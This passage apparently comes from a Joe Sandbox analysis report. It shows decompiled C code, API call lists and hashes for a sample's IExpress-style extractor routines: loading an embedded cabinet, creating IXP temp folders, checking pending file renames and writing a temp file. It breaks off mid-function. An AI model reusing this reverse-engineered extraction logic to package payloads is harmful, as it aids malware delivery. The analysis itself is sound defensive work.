                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 466 404fa0-404fda call 404669 FindResourceA LoadResource LockResource 469 404fe0-404fe7 466->469 470 405121-405123 466->470 471 405017-40501e call 404ecb 469->471 472 404fe9-405011 GetDlgItem ShowWindow GetDlgItem ShowWindow 469->472 475 405020-405037 call 404495 471->475 476 40503c-405074 471->476 472->471 480 4050c7-4050ce 475->480 481 405076-40509a 476->481 482 4050a8-4050c4 call 404495 476->482 484 4050d0-4050d7 FreeResource 480->484 485 4050dd-4050df 480->485 490 4050c6 481->490 491 40509c 481->491 482->490 484->485 487 4050e1-4050e7 485->487 488 4050fa-405101 485->488 487->488 492 4050e9-4050f5 call 404495 487->492 493 405103-40510a 488->493 494 40511f 488->494 490->480 497 4050a3-4050a6 491->497 492->488 493->494 496 40510c-405119 SendMessageA 493->496 494->470 496->494 497->482 497->490
                                                                                                                                                                                                                                      C-Code - Quality: 77%
                                                                                                                                                                                                                                      			E00404FA0(void* __edi, void* __eflags) {
                                                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                                                      				intOrPtr _t5;
                                                                                                                                                                                                                                      				void* _t8;
                                                                                                                                                                                                                                      				struct HWND__* _t9;
                                                                                                                                                                                                                                      				int _t10;
                                                                                                                                                                                                                                      				void* _t12;
                                                                                                                                                                                                                                      				struct HWND__* _t24;
                                                                                                                                                                                                                                      				struct HWND__* _t27;
                                                                                                                                                                                                                                      				intOrPtr _t29;
                                                                                                                                                                                                                                      				void* _t33;
                                                                                                                                                                                                                                      				int _t34;
                                                                                                                                                                                                                                      				CHAR* _t36;
                                                                                                                                                                                                                                      				int _t37;
                                                                                                                                                                                                                                      				intOrPtr _t47;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t33 = __edi;
                                                                                                                                                                                                                                      				_t36 = "CABINET";
                                                                                                                                                                                                                                      				_t5 = E00404669(_t36, 0, 0); // executed
                                                                                                                                                                                                                                      				 *0x409144 = _t5;
                                                                                                                                                                                                                                      				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                                                                                                                                                                                      				 *0x409140 = _t8;
                                                                                                                                                                                                                                      				if(_t8 == 0) {
                                                                                                                                                                                                                                      					return _t8;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				_t9 =  *0x408584; // 0x203b8
                                                                                                                                                                                                                                      				if(_t9 != 0) {
                                                                                                                                                                                                                                      					ShowWindow(GetDlgItem(_t9, 0x842), 0); // executed
                                                                                                                                                                                                                                      					ShowWindow(GetDlgItem( *0x408584, 0x841), 5); // executed
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				_t10 = E00404ECB(0, 0);
                                                                                                                                                                                                                                      				if(_t10 != 0) {
                                                                                                                                                                                                                                      					__imp__#20(E00404C70, E00404C90, E00404950, E00404A20, E00404AA0, E00404B30, E00404B90, 1, 0x409148, _t33);
                                                                                                                                                                                                                                      					_t34 = _t10;
                                                                                                                                                                                                                                      					if(_t34 == 0) {
                                                                                                                                                                                                                                      						L8:
                                                                                                                                                                                                                                      						_t29 =  *0x409148; // 0x0
                                                                                                                                                                                                                                      						_t24 =  *0x408584; // 0x203b8
                                                                                                                                                                                                                                      						E00404495(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                      						_t37 = 0;
                                                                                                                                                                                                                                      						L9:
                                                                                                                                                                                                                                      						goto L10;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					__imp__#22(_t34, "*MEMCAB", 0x401140, 0, E00404CA0, 0, 0x409140); // executed
                                                                                                                                                                                                                                      					_t37 = _t10;
                                                                                                                                                                                                                                      					if(_t37 == 0) {
                                                                                                                                                                                                                                      						goto L9;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					__imp__#23(_t34); // executed
                                                                                                                                                                                                                                      					if(_t10 != 0) {
                                                                                                                                                                                                                                      						goto L9;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					goto L8;
                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                      					_t27 =  *0x408584; // 0x203b8
                                                                                                                                                                                                                                      					E00404495(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                      					_t37 = 0;
                                                                                                                                                                                                                                      					L10:
                                                                                                                                                                                                                                      					_t12 =  *0x409140; // 0x0
                                                                                                                                                                                                                                      					if(_t12 != 0) {
                                                                                                                                                                                                                                      						FreeResource(_t12);
                                                                                                                                                                                                                                      						 *0x409140 = 0;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					if(_t37 == 0) {
                                                                                                                                                                                                                                      						_t47 =  *0x4091d8; // 0x0
                                                                                                                                                                                                                                      						if(_t47 == 0) {
                                                                                                                                                                                                                                      							E00404495(0, 0x4f8, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					if(( *0x408a38 & 0x00000001) == 0 && ( *0x409a34 & 0x00000001) == 0) {
                                                                                                                                                                                                                                      						SendMessageA( *0x408584, 0xfa1, _t37, 0); // executed
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					return _t37;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      			}

















                                                                                                                                                                                                                                      0x00404fa0
                                                                                                                                                                                                                                      0x00404fa6
                                                                                                                                                                                                                                      0x00404fb0
                                                                                                                                                                                                                                      0x00404fb9
                                                                                                                                                                                                                                      0x00404fcd
                                                                                                                                                                                                                                      0x00404fd3
                                                                                                                                                                                                                                      0x00404fda
                                                                                                                                                                                                                                      0x00405123
                                                                                                                                                                                                                                      0x00405123
                                                                                                                                                                                                                                      0x00404fe0
                                                                                                                                                                                                                                      0x00404fe7
                                                                                                                                                                                                                                      0x00404ff7
                                                                                                                                                                                                                                      0x00405011
                                                                                                                                                                                                                                      0x00405011
                                                                                                                                                                                                                                      0x00405017
                                                                                                                                                                                                                                      0x0040501e
                                                                                                                                                                                                                                      0x00405067
                                                                                                                                                                                                                                      0x0040506d
                                                                                                                                                                                                                                      0x00405074
                                                                                                                                                                                                                                      0x004050a8
                                                                                                                                                                                                                                      0x004050a8
                                                                                                                                                                                                                                      0x004050ae
                                                                                                                                                                                                                                      0x004050bf
                                                                                                                                                                                                                                      0x004050c4
                                                                                                                                                                                                                                      0x004050c6
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004050c6
                                                                                                                                                                                                                                      0x0040508d
                                                                                                                                                                                                                                      0x00405093
                                                                                                                                                                                                                                      0x0040509a
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040509d
                                                                                                                                                                                                                                      0x004050a6
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405020
                                                                                                                                                                                                                                      0x00405020
                                                                                                                                                                                                                                      0x00405030
                                                                                                                                                                                                                                      0x00405035
                                                                                                                                                                                                                                      0x004050c7
                                                                                                                                                                                                                                      0x004050c7
                                                                                                                                                                                                                                      0x004050ce
                                                                                                                                                                                                                                      0x004050d1
                                                                                                                                                                                                                                      0x004050d7
                                                                                                                                                                                                                                      0x004050d7
                                                                                                                                                                                                                                      0x004050df
                                                                                                                                                                                                                                      0x004050e1
                                                                                                                                                                                                                                      0x004050e7
                                                                                                                                                                                                                                      0x004050f5
                                                                                                                                                                                                                                      0x004050f5
                                                                                                                                                                                                                                      0x004050e7
                                                                                                                                                                                                                                      0x00405101
                                                                                                                                                                                                                                      0x00405119
                                                                                                                                                                                                                                      0x00405119
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040511f

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00404669: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 0040467A
                                                                                                                                                                                                                                        • Part of subcall function 00404669: SizeofResource.KERNEL32(00000000,00000000,?,00402D11,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00404683
                                                                                                                                                                                                                                        • Part of subcall function 00404669: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 0040469D
                                                                                                                                                                                                                                        • Part of subcall function 00404669: LoadResource.KERNEL32(00000000,00000000,?,00402D11,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046A6
                                                                                                                                                                                                                                        • Part of subcall function 00404669: LockResource.KERNEL32(00000000,?,00402D11,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046AD
                                                                                                                                                                                                                                        • Part of subcall function 00404669: memcpy_s.MSVCRT ref: 004046BF
                                                                                                                                                                                                                                        • Part of subcall function 00404669: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 004046C9
                                                                                                                                                                                                                                      • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00404FBE
                                                                                                                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 00404FC6
                                                                                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 00404FCD
                                                                                                                                                                                                                                      • GetDlgItem.USER32(000203B8,00000842), ref: 00404FF0
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00404FF7
                                                                                                                                                                                                                                      • GetDlgItem.USER32(00000841,00000005), ref: 0040500A
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00405011
                                                                                                                                                                                                                                      • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 004050D1
                                                                                                                                                                                                                                      • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00405119
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                                                      • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                                                      • API String ID: 1305606123-2642027498
                                                                                                                                                                                                                                      • Opcode ID: e31f4eba510dda2cc7b3e0cae17a2d9a928d830c0ec5aa3884e382d2a9ee456e
                                                                                                                                                                                                                                      • Instruction ID: e9c580083e2482a75c59e4e09984ad26a3a9d16a3804433e78e74ff9a6a3ca21
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e31f4eba510dda2cc7b3e0cae17a2d9a928d830c0ec5aa3884e382d2a9ee456e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FE31FAB17403067BE7205F61AF89F67365CE788745F14043ABA05BA2D2DA7D8C108A6D
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                                                                                                                      			E0040535F(CHAR* __ecx, CHAR* __edx) {
                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                                                      				signed int _t5;
                                                                                                                                                                                                                                      				long _t13;
                                                                                                                                                                                                                                      				int _t14;
                                                                                                                                                                                                                                      				CHAR* _t20;
                                                                                                                                                                                                                                      				int _t29;
                                                                                                                                                                                                                                      				int _t30;
                                                                                                                                                                                                                                      				CHAR* _t32;
                                                                                                                                                                                                                                      				signed int _t33;
                                                                                                                                                                                                                                      				void* _t34;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t5 =  *0x408004; // 0xf5e26b31
                                                                                                                                                                                                                                      				_v8 = _t5 ^ _t33;
                                                                                                                                                                                                                                      				_t32 = __edx;
                                                                                                                                                                                                                                      				_t20 = __ecx;
                                                                                                                                                                                                                                      				_t29 = 0;
                                                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                                                      					E0040173E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                                                                                                                                                                                      					_t34 = _t34 + 0x10;
                                                                                                                                                                                                                                      					_t29 = _t29 + 1;
                                                                                                                                                                                                                                      					E004016A0(_t32, 0x104, _t20);
                                                                                                                                                                                                                                      					E00406534(_t32, 0x104,  &_v268); // executed
                                                                                                                                                                                                                                      					RemoveDirectoryA(_t32); // executed
                                                                                                                                                                                                                                      					_t13 = GetFileAttributesA(_t32); // executed
                                                                                                                                                                                                                                      					if(_t13 == 0xffffffff) {
                                                                                                                                                                                                                                      						break;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					if(_t29 < 0x190) {
                                                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					L3:
                                                                                                                                                                                                                                      					_t30 = 0;
                                                                                                                                                                                                                                      					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                                                                                                                                                                                      						_t30 = 1;
                                                                                                                                                                                                                                      						DeleteFileA(_t32);
                                                                                                                                                                                                                                      						CreateDirectoryA(_t32, 0);
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					L5:
                                                                                                                                                                                                                                      					return E00406C80(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                                                                                                                                                                                      				if(_t14 == 0) {
                                                                                                                                                                                                                                      					goto L3;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				_t30 = 1;
                                                                                                                                                                                                                                      				 *0x408a20 = 1;
                                                                                                                                                                                                                                      				goto L5;
                                                                                                                                                                                                                                      			}

















                                                                                                                                                                                                                                      0x0040536a
                                                                                                                                                                                                                                      0x00405371
                                                                                                                                                                                                                                      0x00405377
                                                                                                                                                                                                                                      0x00405379
                                                                                                                                                                                                                                      0x0040537b
                                                                                                                                                                                                                                      0x0040537d
                                                                                                                                                                                                                                      0x0040538f
                                                                                                                                                                                                                                      0x00405394
                                                                                                                                                                                                                                      0x0040539e
                                                                                                                                                                                                                                      0x004053a0
                                                                                                                                                                                                                                      0x004053b3
                                                                                                                                                                                                                                      0x004053b9
                                                                                                                                                                                                                                      0x004053c0
                                                                                                                                                                                                                                      0x004053c9
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004053d1
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004053d3
                                                                                                                                                                                                                                      0x004053d4
                                                                                                                                                                                                                                      0x004053e5
                                                                                                                                                                                                                                      0x004053e8
                                                                                                                                                                                                                                      0x004053e9
                                                                                                                                                                                                                                      0x004053f2
                                                                                                                                                                                                                                      0x004053f2
                                                                                                                                                                                                                                      0x004053f8
                                                                                                                                                                                                                                      0x00405408
                                                                                                                                                                                                                                      0x00405408
                                                                                                                                                                                                                                      0x0040540e
                                                                                                                                                                                                                                      0x00405416
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040541a
                                                                                                                                                                                                                                      0x0040541b
                                                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040173E: _vsnprintf.MSVCRT ref: 00401770
                                                                                                                                                                                                                                      • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 004053B9
                                                                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 004053C0
                                                                                                                                                                                                                                      • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 004053DD
                                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 004053E9
                                                                                                                                                                                                                                      • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 004053F2
                                                                                                                                                                                                                                      • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0040540E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                                                      • API String ID: 1082909758-112269632
                                                                                                                                                                                                                                      • Opcode ID: eee091302b31471704575e6adba9e7d58f769097b262a5e6f6413a4e21065883
                                                                                                                                                                                                                                      • Instruction ID: 25ea820c2757040f1f40ff03429f523989210343f5b8271c1d5639e556c63324
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eee091302b31471704575e6adba9e7d58f769097b262a5e6f6413a4e21065883
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BA11017170060467E3209B369E49F9F766DDFC1714F10003ABA46F22D0CEBC8D568AAE
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 618 402570-402580 619 402625-40262a call 4024e5 618->619 620 402586-40258c 618->620 628 40262c-402630 619->628 622 4025eb-40260a RegOpenKeyExA 620->622 623 40258e 620->623 624 4025e6-4025e9 622->624 625 40260c-402623 RegQueryInfoKeyA 622->625 627 402594-402598 623->627 623->628 624->628 629 4025d4-4025e0 RegCloseKey 625->629 627->628 630 40259e-4025bd RegOpenKeyExA 627->630 629->624 630->624 631 4025bf-4025ce RegQueryValueExA 630->631 631->629
                                                                                                                                                                                                                                      C-Code - Quality: 86%
                                                                                                                                                                                                                                      			E00402570(signed int __ecx) {
                                                                                                                                                                                                                                      				int _v8;
                                                                                                                                                                                                                                      				void* _v12;
                                                                                                                                                                                                                                      				signed int _t13;
                                                                                                                                                                                                                                      				signed int _t19;
                                                                                                                                                                                                                                      				long _t24;
                                                                                                                                                                                                                                      				void* _t26;
                                                                                                                                                                                                                                      				int _t31;
                                                                                                                                                                                                                                      				void* _t34;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                                                      				_t13 = __ecx & 0x0000ffff;
                                                                                                                                                                                                                                      				_t31 = 0;
                                                                                                                                                                                                                                      				if(_t13 == 0) {
                                                                                                                                                                                                                                      					_t31 = E004024E5(_t26);
                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                      					_t34 = _t13 - 1;
                                                                                                                                                                                                                                      					if(_t34 == 0) {
                                                                                                                                                                                                                                      						_v8 = 0;
                                                                                                                                                                                                                                      						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                                                                                                                                                                                      							goto L7;
                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                      							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                                                                                                                                                                                      							goto L6;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						L12:
                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                      						if(_t34 > 0 && __ecx <= 3) {
                                                                                                                                                                                                                                      							_v8 = 0;
                                                                                                                                                                                                                                      							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                                                                                                                                                                                      							if(_t24 == 0) {
                                                                                                                                                                                                                                      								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                                                                                                                                                                                      								L6:
                                                                                                                                                                                                                                      								asm("sbb eax, eax");
                                                                                                                                                                                                                                      								_v8 = _v8 &  !( ~_t19);
                                                                                                                                                                                                                                      								RegCloseKey(_v12); // executed
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      							L7:
                                                                                                                                                                                                                                      							_t31 = _v8;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				return _t31;
                                                                                                                                                                                                                                      				goto L12;
                                                                                                                                                                                                                                      			}











                                                                                                                                                                                                                                      0x00402575
                                                                                                                                                                                                                                      0x00402576
                                                                                                                                                                                                                                      0x00402578
                                                                                                                                                                                                                                      0x0040257b
                                                                                                                                                                                                                                      0x00402580
                                                                                                                                                                                                                                      0x0040262a
                                                                                                                                                                                                                                      0x00402586
                                                                                                                                                                                                                                      0x00402589
                                                                                                                                                                                                                                      0x0040258c
                                                                                                                                                                                                                                      0x004025ee
                                                                                                                                                                                                                                      0x0040260a
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040260c
                                                                                                                                                                                                                                      0x0040261d
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040261d
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040258e
                                                                                                                                                                                                                                      0x0040258e
                                                                                                                                                                                                                                      0x004025a1
                                                                                                                                                                                                                                      0x004025b5
                                                                                                                                                                                                                                      0x004025bd
                                                                                                                                                                                                                                      0x004025ce
                                                                                                                                                                                                                                      0x004025d4
                                                                                                                                                                                                                                      0x004025d9
                                                                                                                                                                                                                                      0x004025dd
                                                                                                                                                                                                                                      0x004025e0
                                                                                                                                                                                                                                      0x004025e0
                                                                                                                                                                                                                                      0x004025e6
                                                                                                                                                                                                                                      0x004025e6
                                                                                                                                                                                                                                      0x004025e6
                                                                                                                                                                                                                                      0x0040258e
                                                                                                                                                                                                                                      0x0040258c
                                                                                                                                                                                                                                      0x00402630
                                                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,?,?,?,00401EE3,00000001,00000000,00404121,?,00404082), ref: 004025B5
                                                                                                                                                                                                                                      • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00404082,?,00401EE3,00000001,00000000,00404121,?,00404082), ref: 004025CE
                                                                                                                                                                                                                                      • RegCloseKey.KERNELBASE(?,?,00401EE3,00000001,00000000,00404121,?,00404082), ref: 004025E0
                                                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,?,?,?,00401EE3,00000001,00000000,00404121,?,00404082), ref: 00402602
                                                                                                                                                                                                                                      • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00404082,00000000,00000000,00000000,00000000,?,00401EE3,00000001,00000000), ref: 0040261D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • PendingFileRenameOperations, xrefs: 004025C6
                                                                                                                                                                                                                                      • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 004025F8
                                                                                                                                                                                                                                      • System\CurrentControlSet\Control\Session Manager, xrefs: 004025AB
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                                                      • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                                                      • API String ID: 2209512893-559176071
                                                                                                                                                                                                                                      • Opcode ID: 671cb9deb3529a5f3ca15adce661aa5a643ef89fa45bb82a48ddbcec2edfd30f
                                                                                                                                                                                                                                      • Instruction ID: 2a49592348dd28d6fd90c2b639ace2b1896eb2870f06d8bcdd423bd1a7c11588
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 671cb9deb3529a5f3ca15adce661aa5a643ef89fa45bb82a48ddbcec2edfd30f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE118275901228BBDF209FA19E0DDEF7E7CEF057A5F104076B805B21C0D6B44A44D6A9
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 632 405880-40588d 633 405890-405895 632->633 633->633 634 405897-4058a9 LocalAlloc 633->634 635 4058ab-4058b9 call 404495 634->635 636 4058cf-40590f call 4016a0 call 406534 CreateFileA LocalFree 634->636 639 4058be-4058c8 call 406233 635->639 636->639 645 405911-405922 CloseHandle GetFileAttributesA 636->645 646 4058ca-4058ce 639->646 645->639 647 405924-405926 645->647 647->639 648 405928-405931 647->648 648->646
                                                                                                                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                                                                                                                      			E00405880(intOrPtr* __ecx) {
                                                                                                                                                                                                                                      				void* _v8;
                                                                                                                                                                                                                                      				intOrPtr _t6;
                                                                                                                                                                                                                                      				void* _t10;
                                                                                                                                                                                                                                      				void* _t12;
                                                                                                                                                                                                                                      				void* _t14;
                                                                                                                                                                                                                                      				signed char _t16;
                                                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                                                      				void* _t23;
                                                                                                                                                                                                                                      				intOrPtr* _t27;
                                                                                                                                                                                                                                      				CHAR* _t33;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                                                      				_t33 = __ecx;
                                                                                                                                                                                                                                      				_t27 = __ecx;
                                                                                                                                                                                                                                      				_t23 = __ecx + 1;
                                                                                                                                                                                                                                      				do {
                                                                                                                                                                                                                                      					_t6 =  *_t27;
                                                                                                                                                                                                                                      					_t27 = _t27 + 1;
                                                                                                                                                                                                                                      				} while (_t6 != 0);
                                                                                                                                                                                                                                      				_t36 = _t27 - _t23 + 0x14;
                                                                                                                                                                                                                                      				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                                                                                                                                                                                      				if(_t20 != 0) {
                                                                                                                                                                                                                                      					E004016A0(_t20, _t36, _t33);
                                                                                                                                                                                                                                      					E00406534(_t20, _t36, "TMP4351$.TMP");
                                                                                                                                                                                                                                      					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                                                                                                                                                                                      					_v8 = _t10;
